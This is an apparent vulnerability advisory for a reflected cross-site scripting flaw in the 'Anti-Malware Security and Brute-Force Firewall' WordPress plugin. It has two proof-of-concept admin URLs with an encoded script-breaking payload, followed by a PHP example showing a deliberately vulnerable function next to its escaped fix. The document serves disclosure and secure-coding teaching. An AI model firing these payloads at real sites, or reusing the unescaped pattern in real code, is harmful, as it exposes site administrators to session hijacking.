wpexploit: Krzysztof Zając, WPEX-ID:276A7FC5-3D0D-446D-92CF-20060AECD0EF
History: Aug 03, 2022 - 12:00 a.m.

Anti-Malware Security and Brute-Force Firewall < 4.21.83 - Reflected Cross-Site Scripting


EPSS: 0.001 (Low)
EPSS Percentile: 43.6%

The plugin does not sanitise and escape some parameters before outputting them back in an admin dashboard, leading to Reflected Cross-Site Scripting.

https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E

Also possible with the $_GET['eli'] parameter: http://example.com/wp-admin/admin.php?page=GOTMLS-settings&eli=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E
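Added illustration of the defect class and its fix, not code from the plugin or the advisory: a hypothetical settings page that reflects the GOTMLS_debug and eli query parameters, first unescaped and then escaped for the context each value lands in. The parameter names and payload come from the advisory; the page shape, function names and the stand-alone shims for the WordPress escaping helpers are assumptions.

```php
<?php
// Added illustration, not the plugin's code: a hypothetical admin page that
// reflects the GOTMLS_debug and eli query parameters named in the advisory.

// Shims so the file runs outside WordPress (WordPress defines these itself).
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('wp_json_encode')) {
    function wp_json_encode($data, $flags = 0) {
        return json_encode($data, $flags);
    }
}

// Vulnerable pattern (assumed shape of the defect the advisory describes):
// raw query values concatenated into HTML text and into an inline script.
function render_debug_panel_vulnerable(array $get): string {
    $debug = $get['GOTMLS_debug'] ?? '';
    $eli   = $get['eli'] ?? '';
    return '<p>Debug mode: ' . $debug . '</p>'
         . '<script>var eli = "' . $eli . '";</script>';
}

// Hardened pattern: escape for the context each value lands in.
// esc_html() neutralises markup in HTML text; JSON_HEX_TAG turns < and >
// into \u003C and \u003E so the string can never close the <script> element.
function render_debug_panel_fixed(array $get): string {
    $debug = $get['GOTMLS_debug'] ?? '';
    $eli   = $get['eli'] ?? '';
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return '<p>Debug mode: ' . esc_html($debug) . '</p>'
         . '<script>var eli = ' . wp_json_encode($eli, $flags) . ';</script>';
}

// Constructed request mirroring the advisory's proof-of-concept payload.
$request = [
    'GOTMLS_debug' => '</script><img src onerror=alert(1);>',
    'eli'          => '</script><img src onerror=alert(1);>',
];

// Reflected verbatim: the browser parses and executes the injected markup.
echo render_debug_panel_vulnerable($request), PHP_EOL;
// Reflected as inert text: &lt;/script&gt; and \u003C/script\u003E.
echo render_debug_panel_fixed($request), PHP_EOL;
```

In a real plugin the same page should also gate on current_user_can() and a nonce, but the escaping alone is what removes the reflected XSS.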

